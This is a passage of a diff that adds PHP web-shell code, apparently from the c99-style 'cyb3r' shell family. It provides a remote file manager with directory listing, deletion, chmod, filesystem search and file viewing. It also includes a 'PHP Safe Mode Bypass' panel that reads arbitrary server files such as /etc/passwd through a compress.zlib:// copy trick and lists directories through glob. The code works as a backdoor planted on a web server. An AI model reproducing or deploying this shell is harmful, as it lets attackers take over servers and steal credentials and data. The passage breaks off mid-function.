+   $row[$k] .= $y;
+
+   for($i=0;$i<count($row)-1;$i++)
+
+   {
+
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+
+   }
+
+   $v = $parsesort[0];
+
+   usort($objects["folders"], "tabsort");
+
+   usort($objects["links"], "tabsort");
+
+   usort($objects["files"], "tabsort");
+
+   if ($parsesort[1] == "d")
+
+   {
+
+    $objects["folders"] = array_reverse($objects["folders"]);
+
+    $objects["files"] = array_reverse($objects["files"]);
+
+   }
+
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+
+   $tab = array();
+
+   $tab["cols"] = array($row);
+
+   $tab["head"] = array();
+
+   $tab["folders"] = array();
+
+   $tab["links"] = array();
+
+   $tab["files"] = array();
+
+   $i = 0;
+
+   foreach ($objects as $a)
+
+   {
+
+    $v = $a[0];
+
+    $o = basename($v);
+
+    $dir = dirname($v);
+
+    if ($disp_fullpath) {$disppath = $v;}
+
+    else {$disppath = $o;}
+
+    $disppath = str2mini($disppath,60);
+
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    foreach ($regxp_highlight as $r)
+
+    {
+
+     if (ereg($r[0],$o))
+
+     {
+
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();}
+
+      else
+
+      {
+
+       $r[1] = round($r[1]);
+
+       $isdir = is_dir($v);
+
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+
+       {
+
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+
+        $disppath = $r[2].$disppath.$r[3];
+
+        if ($r[4]) {break;}
+
+       }
+
+      }
+
+     }
+
+    }
+
+    $uo = urlencode($o);
+
+    $ud = urlencode($dir);
+
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+
+    {
+
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+
+     $row[] = "LINK";
+
+    }
+
+    elseif ($o == "..")
+
+    {
+
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+
+     $row[] = "LINK";
+
+    }
+
+    elseif (is_dir($v))
+
+    {
+
+     if (is_link($v))
+
+     {
+
+      $disppath .= " => ".readlink($v);
+
+      $type = "LINK";
+
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+
+     }
+
+     else
+
+     {
+
+      $type = "DIR";
+
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+
+      }
+
+     $row[] = $type;
+
+    }
+
+    elseif(is_file($v))
+
+    {
+
+     $ext = explode(".",$o);
+
+     $c = count($ext)-1;
+
+     $ext = $ext[$c];
+
+     $ext = strtolower($ext);
+
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+
+     $row[] = view_size($a[1]);
+
+    }
+
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+
+    if (!$win) {$row[] = $a[3];}
+
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+
+    $i++;
+
+   }
+
+  }
+
+  // Compiling table
+
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+
+  foreach($table as $row)
+
+  {
+
+   echo "<tr>\r\n";
+
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+
+   echo "</tr>\r\n";
+
+  }
+
+  echo "</table><br><hr size=\"1\" noshade><p align=\"right\">
+
+  <script>
+
+  function ls_setcheckboxall(status)
+
+  {
+
+   var id = 1;
+
+   var num = ".(count($table)-2).";
+
+   while (id <= num)
+
+   {
+
+    document.getElementById('actbox'+id).checked = status;
+
+    id++;
+
+   }
+
+  }
+
+  function ls_reverse_all()
+
+  {
+
+   var id = 1;
+
+   var num = ".(count($table)-2).";
+
+   while (id <= num)
+
+   {
+
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+
+    id++;
+
+   }
+
+  }
+
+  </script>
+
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+
+  {
+
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+
+  }
+
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+
+  if ($usefsbuff)
+
+  {
+
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+
+  }
+
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+
+  echo "</form><hr size=\"1\" noshade>";
+ } 
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>
+     <tr> <!-- 1 -->
+           <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>
+           <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>
+           <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>
+         </tr>
+     <tr><!-- 3 -->
+         <td valign="top">
+
+   <center><b>(: List Directories :)</b>    <form action="<?php echo $surl; ?>">
+
+      <div align="center"><br>
+
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>
+<?php
+
+        
+
+        function rsg_glob()
+
+{
+
+$chemin=$_GET['directory'];
+
+$files = glob("$chemin*");
+
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+
+foreach ($files as $filename) {
+
+        echo "<pre>";
+
+   echo "$filename\n";
+
+   echo "</pre>";
+
+}
+
+}
+
+
+
+if(isset($_GET['directory']))
+
+{
+
+rsg_glob();
+
+}
+
+
+
+?>
+
+
+    </form></center>
+
+    </td>
+         <td>
+         <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
+         </td>
+         <td>
+         <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
+         </td>
+         </tr>
+          <tr><!-- 2 -->
+            <td valign="top">
+
+         <div align="center"><b>(: Read Files :)</b></div><br>
+
+         <form action="<?php echo $surl; ?>">
+
+            <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+                        <?php     
+
+      function rsg_read()
+
+        {       
+
+        $test="";
+
+        $temp=tempnam($test, "cx");
+
+        $file=$_GET['file'];    
+
+        $get=htmlspecialchars($file);
+
+        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+
+        if(copy("compress.zlib://".$file, $temp)){
+
+        $fichier = fopen($temp, "r");
+
+        $action = fread($fichier, filesize($temp));
+
+        fclose($fichier);
+
+        $source=htmlspecialchars($action);
+
+        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+
+        unlink($temp);
+
+        } else {
+
+        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+
+        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+
+        access.</CENTER></FONT>");
+
+                        }
+
+        echo "</div>";
+
+        }
+
+        
+
+        if(isset($_GET['file']))
+
+{
+
+rsg_read();
+
+}
+
+        
+
+        ?>
+            
+
+          <br>
+
+      </div>
+
+         </form>
+
+        </td>
+            <td >
+                <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
+                </td>
+                <td>
+                <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
+                </td>
+                
+         </tr>
+     
+ </table> <?php 
+ }
+
+
+if ($act == "delete")
+
+{
+
+ $delerr = "";
+
+ foreach ($actbox as $v)
+
+ {
+
+  $result = FALSE;
+
+  $result = fs_rmobj($v);
+
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+
+ }
+
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+
+ $act = "ls";
+
+}
+
+if ($act == "chmod")
+
+{
+
+ $mode = fileperms($d.$f);
+
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+
+ else
+
+ {
+
+  $form = TRUE;
+
+  if ($chmod_submit)
+
+  {
+
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+
+   else {$err = "Can't chmod to ".$octet.".";}
+
+  }
+
+  if ($form)
+
+  {
+
+   $perms = parse_perms($mode);
+
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+
+  }
+
+ }
+
+}
+
+if ($act == "search")
+
+{
+
+ echo "<b>Search in file-system:</b><br>";
+
+ if (empty($search_in)) {$search_in = $d;}
+
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+
+ {
+
+  $found = array();
+
+  $found_d = 0;
+
+  $found_f = 0;
+
+  $search_i_f = 0;
+
+  $search_i_d = 0;
+
+  $a = array
+
+  (
+
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+
+   "text_wwo"=>$search_text_wwo,
+
+   "text_cs"=>$search_text_cs,
+
+   "text_not"=>$search_text_not
+
+  );
+
+  $searchtime = getmicrotime();
+
+  $in = array_unique(explode(";",$search_in));
+
+  foreach($in as $v) {cyb3rfsearch($v);}
+
+  $searchtime = round(getmicrotime()-$searchtime,4);
+
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+
+  else
+
+  {
+
+   $ls_arr = $found;
+
+   $disp_fullpath = TRUE;
+
+   $act = "ls";
+
+  }
+
+ }
+
+ echo "<form method=POST>
+
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+
+}
+
+if ($act == "fsbuff")
+
+{
+
+ $arr_copy = $sess_data["copy"];
+
+ $arr_cut = $sess_data["cut"];
+
+ $arr = array_merge($arr_copy,$arr_cut);
+
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+
+}
+
+if ($act == "d")
+
+{
+
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+
+ else
+
+ {
+
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+
+  if (!$win)
+
+  {
+
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+
+   $ow = posix_getpwuid(fileowner($d));
+
+   $gr = posix_getgrgid(filegroup($d));
+
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+
+  }
+
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+
+ }
+
+}
+
+if ($act == "chmod")
+
+{
+
+ $mode = fileperms($d.$f);
+
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+
+ else
+
+ {
+
+  $form = TRUE;
+
+  if ($chmod_submit)
+
+  {
+
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+
+   else {$err = "Can't chmod to ".$octet.".";}
+
+  }
+
+  if ($form)
+
+  {
+
+   $perms = parse_perms($mode);
+
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+
+  }
+
+ }
+
+}
+
+if ($act == "f")
+
+{
+
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+
+ {
+
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+
+ }
+
+ else
+
+ {
+
+  $r = @file_get_contents($d.$f);
+
+  $ext = explode(".",$f);
+
+  $c = count($ext)-1;
+
+  $ext = $ext[$c];
+
+  $ext = strtolower($ext);
+
+  $rft = "";
+
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+
+  if (empty($ft)) {$ft = $rft;}
+
+  $arr = array(
+
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+
+   array("Code","code"),
+
+   array("Session","phpsess"),
+
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+
+   array("SDB","sdb"),
+
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+
+  );
+
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+
+  foreach($arr as $t)
+
+  {
+
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+
+  }
+
+  echo "<hr size=\"1\" noshade>";
+
+  if ($ft == "info")
+
+  {
+
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+
+   if (!$win)
+
+   {
+
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+
+    $ow = posix_getpwuid(fileowner($d.$f));
+
+    $gr = posix_getgrgid(filegroup($d.$f));
+
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+
+   }
+
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+
+   $fi = fopen($d.$f,"rb");
+
+   if ($fi)
+
+   {
+
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+
+    $n = 0;
+
+    $a0 = "00000000<br>";
+
+    $a1 = "";
+
+    $a2 = "";
+
+    for ($i=0; $i<strlen($str); $i++)
+
+    {
+
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+
+     switch (ord($str[$i]))
+
+     {
+
+      case 0:  $a2 .= "<font>0</font>"; break;
+
+      case 32:
+
+      case 10:
+
+      case 13: $a2 .= "&nbsp;"; break;
+
+      default: $a2 .= htmlspecialchars($str[$i]);
+
+     }
+
+     $n++;
+
+     if ($n == $hexdump_rows)
+
+     {
+
+      $n = 0;
+
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+
+      $a1 .= "<br>";
+
+      $a2 .= "<br>";
+
+     }
+
+    }
+
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+
+   }
+
+   $encoded = "";
+
+   if ($base64 == 1)
+
+   {
+
+    echo "<b>Base64 Encode</b><br>";
+
+    $encoded = base64_encode(file_get_contents($d.$f));
+
+   }
+
+   elseif($base64 == 2)
+
+   {
+
+    echo "<b>Base64 Encode + Chunk</b><br>";
+
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+
+   }
+
+   elseif($base64 == 3)
+
+   {
+
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+
+    $encoded = base64_encode(file_get_contents($d.$f));
+
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+
+   }
+
+   elseif($base64 == 4)
+
+   {
+
+    $text = file_get_contents($d.$f);
+
+    $encoded = base64_decode($text);
+
+    echo "<b>Base64 Decode";
+
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+
+    echo "</b><br>";
+
+   }
+
+   if (!empty($encoded))
+
+   {
+
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+
+   }
+
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+
+<P>";
+
+  }
+
+  elseif ($ft == "html")
+
+  {
+
+   if ($white) {@ob_clean();}
+
+   echo $r;
+
+   if ($white) {cyb3rexit();}
+
+  }
+
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+
+  elseif ($ft == "phpsess")
+
+  {
+
+   echo "<pre>";
+
+   $v = explode("|",$r);
+
+   echo $v[0]."<br>";
+
+   var_dump(unserialize($v[1]));
+
+   echo "</pre>";
+
+  }
+
+  elseif ($ft == "exe")
+
+  {
+
+   $ext = explode(".",$f);
+
+   $c = count($ext)-1;
+
+   $ext = $ext[$c];
+
+   $ext = strtolower($ext);
+
+   $rft = "";
+
+   foreach($exeftypes as $k=>$v)
+
+   {
+
+    if (in_array($ext,$v)) {$rft = $k; break;}
+
+   }
+
+   $cmd = str_replace("%f%",$f,$rft);
+
